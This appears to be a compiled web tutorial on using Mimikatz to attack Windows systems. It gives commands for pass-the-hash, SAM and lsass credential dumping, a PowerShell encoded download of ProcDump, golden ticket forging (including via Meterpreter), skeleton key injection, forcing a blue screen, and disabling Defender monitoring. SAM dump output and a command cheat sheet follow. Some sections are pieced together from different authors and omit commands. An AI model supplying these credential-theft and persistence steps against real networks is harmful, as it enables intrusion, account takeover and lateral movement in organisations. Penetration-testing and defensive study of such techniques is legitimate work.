Mimikatz

Mimikatz

Pass The Hash is the attack of the industry! It works anywhere where credentials are not managed properly. Attacks can occur both on local and domain accounts.

There are certain types of prevention measures available but most often they are not implemented in the infrastructure. In other words, thanks to the single-sign-on in Windows, it is possible to migrate from host to host when being authenticated only with a hash.

First of all, every single time penetration tests are to be done, Pass The Hash is one of the elements of the whole test. The reason is that many companies do not do anything about it, while the attack is popular for the past couple of years.

In this episode you will be guided on how to perform the Pass The Hash attack and the pre-conditions for it and why managing local administrator passwords is important but not everything. Take, for example, logging on with privileged accounts to the workstation or to the servers is something that we should definitely pay attention to. Throughout the whole process, I will use the tool, CQHashDumpV2, which is quite a unique tool made by our team, it is also not recognized by any anti-virus (for now).

Download the tool
The password to open the zip is CQUREAcademy#123!

Pass The Hash Attack – Procedure

When performing the Pass The Hash from scratch local administrator’s privileges are required, mainly because of the Debug Privilege; you should also have two consoles opened: one as a user and the other one as an administrator.

In the console running as an administrator, we can identify it by the list of different kinds of privileges. Here, I’ll appear as a member of the local administrators.

Pass the Hash Tutorial

If you have not tried the Pass The Hash attack before, stay tuned and let’s go.

Step one: getting the tool

The first thing needed in order to perform Pass The Hash is to get the hash. There are plenty of tools available in the market that you can use. But be careful because a lot of them may not be really safe. One of the examples is a free tool called pwdump which comes in many different variants and which, sometimes contain malware. The reason why we wrote our own tool, CQHashDumpV2, is because we needed it of course for our penetration tests.

It’s absolutely not acceptable to use the tools that we don’t know anywhere in the customer’s environment. Only the tools that are our tools or the ones that we know well.

Step two: hash dumping

The first thing here is to elevate to the Local System as we have to get access to the secret hives in the registry. For that we will use the PsExec tool that was already shown in the previous video, so if you stay with me you should be able to use it for now: psexec -s -i -d cmd.exe.

You can see that I am the nt authority\system. The next stage is to go to the tools folder and I will use CQHashDumpV2. I will use option /samdump. This allows me to perform the live hash dump.

Download the tool
The password to open the zip is CQUREAcademy#123!

Pass the Hash Tutorial

There are two types of hashes. One of them is called LM Hash and if you observe closely, this is a mirrored value. These values are just the same. That means that it is an empty password. Technically it means that this hash is not being used. The part after the colon is called NT Hash or NTLM Hash. This is MD4 calculated for the users’ passwords and we will use it to perform Pass The Hash attack.

Here I’m logged on as the local account Paula and I want to become the local Administrator, so in order to do it, I will use Mimikatz. It’s our edition, marked as  “CQURE Edition”.

Pass the hash attack

>>LINK to the Mimikatz<<

We will grab the Debug Privilege first: privilege::debug. This is the privilege we need in order to work with processes like lsass.exe.

When we get it then the next stage is to use: sekurlsa::pth for Pass The Hash. Then the specified username – in this case administrator – and then domain: localhost, because in this case, we don’t have any kind of domain credentials and /ntlm with that particular hash. The command looks like this:

sekurlsa::pth    /user:Administrator     /domain:localhost /ntlm:<here you put NT Hash>

This is the Pass The Hash attack, as you see it’s very simple. In this attack we authenticate locally, we create a token, where we will be a local administrator (with SID 500).

pass-the-hash-tutorial

A new console will be opened automatically. If I issue whoami command it will give an interesting result as I have got information about myself, but that’s not really true we do have already an administrative token here.

The next thing that we will do is to use PsExec tool and we will verify if we are able to get access to that particular server here and that server is going to be 10.10.10.200. We would like to execute cmd.exe remotely.

You will observe a difference. Let me start this console as administrator. This is the console that is local and the gray one is the console with that local administrator’s token. So we choose to use PsExec like this: psexec.exe \\10.10.10.200 cmd.exe. We are not able to use it as the original local account because the username or password is incorrect. This is also interesting because we might ask: what kind of password we are talking about? In this case, this is the single sign-on used by Windows.

On the administrator’s token

Moving further, we will get into the same situation as before but with the local administrator’s token. In the new console, we need to issue the same Psexec command. Now, it takes a little while, but you will see that it works because a local administrator is using the same password. When logged on, issue whoami and you will see you are the local administrator.

How to perform a memory dump

In the previous tutorials I showed you that scenario in order to implement LAPS: Local Administrator Password Solution for management of the local administrator passwords, but over here we will continue because you will be shown how we are able, at that stage, to perform memory dump in order to get higher privileges during the attack.

Now, this could be a little bit of a challenge as we need to upload a tool into the server that is our victim here. The only thing that we’ve got though is the command line. We could do it by connecting with the PsExec, there is a /c option for copying. But let’s say we didn’t do it, now what? We could use FTP and we could try to copy something from the net. One of my favorite ways is to use the PowerShell encoded command.

PowerShell encoded command

PowerShell encoded command can be executed once on the box remotely. I have prepared a little PowerShell script where we are using Invoke-WebRequest cmdlet to download a Procdump tool into pd.exe file. So, we got it. We are converting this to Base64 .

$tool=”Invoke-WebRequest -OutFile c:\temp\pd.exe”

$base64=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($tool))

LINK to the Procdump from Sysinternals.com

pass-the-hash-attack-

The Base64 result we can stream to a file, let’s say base64.txt, and our base64.txt will be a command that we will be using within the PowerShell encoded command. It’s going to be like this: PowerShell –ec <here you should paste base64 string>.

After running the PowerShell encoded command, we download the tool from the web and we save it in the folder. The pd.exe is our ProcDump.

For now, what is important is how to use this kind of tools. For example, ProcDump, when run for the first time, it has a parameter to accept EULA (accepteula), it is necessary to use it otherwise you will get stuck in the remote console. We would like to perform the memory dump of the process lsass.exe: procdump.exe accepteula -ma lsass.exe. The dump is being written, so the dump is ready.

Pass The Hash Tutorial

As you remember from the previous videos, you can take this particular dump and then use it with Mimikatz for instance, for the memory analysis and then we are able to extract information from it.

We will switch to the machine where we have the dump. We can rename it to lsass.dmp. We can open Mimikatz and then we issue:

sekurlsa::minidump lsass.dmp

and then: sekurlsa::logonpasswords

and then we are able to spot in this dump, all the interesting data that is related to the user’s credentials.

We are doing this on the remote server right now but in the whole hacking process, this will not be possible. You can try to copy that particular data to your client back and then analyze it on your side. This is how it’s meant to be I’m showing you information about what is in this dump.

Conclusion

We have performed Pass The Hash attack and you should be familiar with all the steps in order to reproduce it. Remember that attack is possible when you have the possibility to get the Debug Privilege, that means you must be a member of the Local Administrators group and this is the prerequisite for the Pass The Hash attack. Remember that PsExec (from Sysinternals) can help here but only for educational purposes, you cannot use it for hacking (it is against the license). At the end, we need Mimikatz or some other custom tools to perform the attack. To perform the memory dumps you can use any memory dumper, for our example I used ProcDump, where at the end we have analyzed the dump by using Mimikatz.

Generate Skeleton Key with Mimikatz

Victim: Windows Server 2012 R2 (Domain Controller)

Attacker: Mimikatz (On Windows Server 2012 R2)

In this attack, what mimikatz installs the patch on the Domain Controller to accept “mimikatz” as a new logon password? It can be thought as a Master Key which will open the Active Directory to the attacker. This attack can be performed as shown below.

First, I will try to logon on my Server using mimikatz as a password.

As you can see clearly that we cannot logon into server using ‘mimikatz’ as a password.

Now I will login the server using its password which is ‘T00r’.

And as you can see below I have logged in the Server using the correct password

If you ever are logged in on a server or have a server unlocked, you can create a skeleton key to be stored inside the memory of the Server by using Mimikatz.

Launch the Mimikartz Terminal according to the architecture of the server (x32, x64). Now first we will get the Debuging privilege in Mimikatz using

And then we will inject the mimikatz skeleton key in the memory of server using

With this we have our skeleton key successfully injected on the server.

Note: You will have to open mimikatz with Administrative Privilege to create a Skeleton Key.

Now I will try to login the server using the skeleton key “mimikatz” we just injected in the memory. Remember last time we tried to login the server using mimikatz as a password we were unsuccessful.

But this time ‘mimikatz’ was accepted as a password. This does not mean that we reset the original password ‘T00r’. The server will continue to login using ‘T00r’ but now it will also accept ‘mimikatz’ as a password too.

Now, remember that we injected the skeleton key in the memory, not in storage so the next time that admin restarts the server we will lose the access. So the best way to protect your Domain Controller from Skeleton Key is a practice of restarting the Server Frequently or prevents mimikatz from accessing the memory.

Blue Screen of Death (bsod) with Mimikatz

Attacker: Mimikatz (on Windows 7)

Victim: Windows 7

We can perform a Blue Screen of Death or bsod attack using mimikatz. This shows how powerful this tool is.  To perform the bsod on a System follow the steps mentioned below:

  • Run mimikatz with Administrator
  • Start mimidrv service

Now Initiate the Bsod as given below in the following command.

As you can see below we have the Blue Screen of Death Error

Note: This attack can corrupt data and potentially harm the system. Use Carefully !!

Display Hostname

You can extract hostname of the Victim System by typing hostname in the mimikatz Terminal.

We have extracted the hostname of system as Pavan-pc

Golden Ticket Generation with Mimikatz

Attacker: Mimikatz on Windows Server 2012 R2

Victim: Windows Server 2012 R2

To Generate a Golden Ticket, we will require the following information:

  1. Domain
  2. SID
  3. NTLM Hash

Let’s get the Domain First.

To get the Domain we will run the ipconfig /all from the Command Line or PowerShell

  • Domain on my Server is Pavan.local
  • Now to get SID we will use whoami /user command as shown in given below image.

Now we will mimikatz itself to extract the ntml hash required to generate the Ticket.

First we will get the Debugging Privilege using following command given below.

And now to extract hashses we will run following command given below.

And now we have it all that we need to generate the Ticket.

Syntax: kerberos::golden /domain:[Domain] /sid:[SID] /rc4:[NTLM Hash] /user:[Username To Create] /id:500 /ptt

Here I am creating the golden key for a user named ‘hacker’; you can use any of the existing users of the Domain or create a new one.

I am using [/ppt] option to pass the ticket in the current session.

Now run command prompt to the access of Share Folder and execute given below command:

Now we are in Z: drive execute given below command for NT directory services

As you can see that we get the access to the share folder which cannot be accessed without Admin Access but we had obtained it without using CMD as administrator. From given below image you can observe that it is showing 8 file and 2 folder.

Remotely Generating Golden Ticket

Attacker: Kali

Victim: Windows Server 2012 R2

Firstly get a Meterpreter Access of the Server which you can learn from here

Once gaining the meterpreter upload the mimikatz folder to the victim system using the command

Remember to use -r so that upload command uploads recursively.

Open the shell and extract Domain using ipconfig /all

And SID using the whoami /user

Now go to the location where we uploaded the mimikatz earlier and run mimikatz.exe as shown below

 

First we will get the Debugging Privilege using following command given below.

Now let’s extract the krbtgt NTLM hash using the following command

Now using all the information extracted lets generate a golden ticket in the same way we did above.

Now let’s take the access of Share Folder and as you can see that we get the access to the share folder which cannot be accessed without Admin Access.

Hence we successfully generated a golden ticket in a Windows Server Remotely via Kali

Now let’s take the access of Share Folder and as you can see that we get the access to the share folder which cannot be accessed without Admin Access.

Hence we successfully generated a golden ticket in a Windows Server Remotely via Kali

Author: Pavandeep Singh

PS C:\Windows\system32> Set-MpPreference -DisableRealtimeMonitoring $true
.#####. mimikatz 2.1.1 (x64) #17763 Dec 9 2018 23:56:50
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # lsadump::sam /system:
Domain : LT-JACCO
SysKey : 0d0097f1df6b6e5cc383fefdf8f3a00a
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

mimikatz # lsadump::sam /system:C:\Users\Public\SYSTEM /SAM:
Domain : LT-JACCO
SysKey : 0d0097f1df6b6e5cc383fefdf8f3a00a

mimikatz # lsadump::sam /system:C:\Users\Public\SYSTEM /SAM:C:\Users\public\SAM
Domain : LT-JACCO
SysKey : 0d0097f1df6b6e5cc383fefdf8f3a00a
Local SID : S-1-5-21-2919707410-2844309251-2276676231

SAMKey : 6a252145d21f6cdf6ac281cf245785f6

RID : 000001f4 (500)
User : Administrator

RID : 000001f5 (501)
User : Guest

RID : 000001f7 (503)
User : DefaultAccount

RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 307*****aa0

RID : 000003ee (1006)
User : jacco
Hash NTLM: dc7*****1c2

RID : 000003ef (1007)
User : Hillie
Hash NTLM: 8b3*****980

mimikatz #

Mimikatz Commands:

  • logonpasswords: mimikatz # sekurlsa::logonpasswords)
    • Extracts passwords in memory
  • pth (pass the hash):
    mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
    • A fake identity is created and the faske identitt’s NTLM hash is replaced with the real one.
    • “ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)”
    • “AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.”
  • ptt (pass the ticket):
    mimikatz # kerberos::ptt
    • Enables Kerberos ticket (TGT or TGS) injection into the current session.
  • tickets:  mimikatz # sekurlsa::tickets /export
    • Identifies all session Kerberos tickets and lists/exports them.
    • sekurlsa pulls the Kerberos data from memory and can access all user session tickets on the computer.
  • ekeys:  mimikatz # sekurlsa::ekeys
    • Extract the Kerberos ekeys from memory. Provides theft of a user account until the password is changed (which may be never for a Smartcard/PKI user).
  • dpapi:  mimikatz # sekurlsa::dpapi
  • minidump:
    mimikatz # sekurlsa::minidump lsass.dmp
    • Perform a minidump of the LSASS process and extract credential data from the lsass.dmp. A minidump can be saved off the computer for credential extraction later, but the major version of Windows must match (you can’t open the dump file from Windows 2012 on a Windows 2008 system).
  • kerberos:
    mimikatz # sekurlsa::kerberos
    •  Extracts the smartcad/PIV PIN from memory (cached in LSASS when using a smartcard).
  • debug:
    mimikatz # privilege::debug
    • Sets debug mode for current mimikatz session enabling LSASS access.
  • lsadump cache: (requires token::elevate to be SYSTEM)
    mimikatz # lsadump::cache
    • Dumps cached Windows domain credentials from HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible SYSTEM).

References: